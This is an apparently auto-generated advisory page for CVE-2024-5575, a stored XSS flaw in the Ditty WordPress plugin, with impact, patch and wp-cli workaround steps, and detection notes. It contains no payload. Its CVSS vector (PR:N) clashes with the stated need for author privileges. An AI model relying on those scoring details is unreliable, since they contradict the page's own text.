Login Sign Up

CVE-2024-5575

4.7 MEDIUM
Cross-Site Scripting

📋 TL;DR

The Ditty WordPress plugin before version 3.1.43 contains a stored cross-site scripting (XSS) vulnerability in block settings. This allows authenticated users with author-level privileges or higher to inject malicious scripts that execute when other users view affected content, even when unfiltered_html capabilities are disabled. WordPress sites using vulnerable versions of the Ditty plugin are affected.

💻 Affected Systems

Products:
  • Ditty WordPress Plugin
Versions: All versions before 3.1.43
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress installation with Ditty plugin enabled. Vulnerability requires author-level or higher privileges to exploit.

📦 What is this software?

Ditty by Metaphorcreations

View all CVEs affecting Ditty →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with author privileges could inject malicious JavaScript that steals administrator credentials, redirects users to malicious sites, or performs actions on behalf of authenticated users, potentially leading to full site compromise.

🟠

Likely Case

Malicious authors could inject scripts that display unwanted content, redirect users, or steal session cookies from other users viewing affected Ditty blocks.

🟢

If Mitigated

With proper user access controls and content filtering, the impact is limited to potential content defacement within Ditty blocks.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access with at least author privileges. The vulnerability is in block settings that aren't properly sanitized.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.1.43

Vendor Advisory: https://wpscan.com/vulnerability/65d1abb7-92e9-4cc4-a1d0-84985b484af3/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Ditty plugin and click 'Update Now'. 4. Verify version shows 3.1.43 or higher.

🔧 Temporary Workarounds

Disable Ditty Plugin

all

Temporarily disable the Ditty plugin until patched

wp plugin deactivate ditty

Restrict User Roles

all

Limit author and editor roles to trusted users only

🧯 If You Can't Patch

  • Implement strict user access controls and only grant author privileges to trusted users
  • Enable WordPress security plugins that provide additional XSS protection and user activity monitoring

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Installed Plugins, find Ditty and verify version is below 3.1.43

Check Version:

wp plugin get ditty --field=version

Verify Fix Applied:

After updating, verify Ditty plugin version shows 3.1.43 or higher in WordPress admin

📡 Detection & Monitoring

Log Indicators:

  • Unusual content modifications in Ditty blocks
  • Multiple failed login attempts followed by successful author login

Network Indicators:

  • Unexpected JavaScript loading from Ditty content
  • Suspicious outbound connections from Ditty pages

SIEM Query:

source="wordpress" AND (plugin="ditty" AND (event="update" OR event="modify"))

📊 Metadata

CVE ID: CVE-2024-5575
CVSS v3 Score: 4.7 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CWE: CWE-79
Published: July 13, 2024
Last Updated: May 13, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-5575, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)